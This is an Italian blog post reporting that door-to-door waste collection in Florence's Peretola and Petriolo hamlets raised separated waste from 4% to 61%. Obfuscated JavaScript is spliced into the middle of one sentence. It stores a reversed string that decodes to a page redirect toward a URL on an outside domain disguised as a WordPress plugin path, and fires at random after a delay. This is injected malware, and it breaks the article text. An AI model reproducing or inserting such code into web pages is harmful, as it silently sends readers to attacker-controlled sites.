Porta a porta, i rifiuti intelligenti

image_pdfimage_print

Dal 4% al 61% in solo cinque settimane. Sono i dati della raccolta differenziata dei rifiuti che riguardano le 1664 famiglie (oltre 3700 cittadini) e i 131 esercizi commerciali dei borghi fiorentini di Peretola e Petriolo, che dal 13 marzo stanno speriment (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}ando il sistema di raccolta porta a porta. Di 88.093 kg di rifiuti prodotti sono così 53.720 kg quelli differenziati. Dati importanti, comunicati in Consiglio Comunale dall’assessore alla partecipazione democratica e agli stili di vita Cristina Bevilacqua. I commenti positivi arrivano un po’ da tutti i settori: eccezion fatta per qualche “nostalgico” dei cassonetti, solo suggerimenti per migliorare. In particolare i cittadini interessati dal progetto segnalano la scarsa frequenza con la quale vengono ritirati i rifiuti organici. Eppure gli amministratori insistono per l’inceneritore…

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *